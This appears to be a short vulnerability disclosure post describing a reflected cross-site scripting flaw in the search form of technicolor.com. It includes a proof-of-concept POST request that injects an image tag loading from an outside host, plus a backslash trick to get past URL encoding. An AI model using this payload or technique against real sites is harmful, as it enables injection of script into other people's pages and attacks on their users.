Technicolor.com search form XSS bug
Vulnerable page: http://www.technicolor.com/search/In order to reproduce the bug, you have to replace any forward slash / with backslash \ because forward slash is being URL encoded.
PoC
POST /search/ HTTP/1.1Host: www.technicolor.com
search_block_form=<img src=http:\\te-home.net\gallery\xssd_by_teamelite.png>
You can either include any XSS code in search input box, or request any XSS code directly using POST method and search_block_form parameter.
Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Комментарии
| Дата | Автор | Комментарий |
|---|---|---|
| - | - | Leave your comment |
| 2016-05-14 15:10 | Sam | I have Technicolor router ![]() |
| - | - | Leave your comment |
Новости
Работа
Сеть
Форум
Галерея
Хаблист
Инструменты
Статистика
О нас
Войти

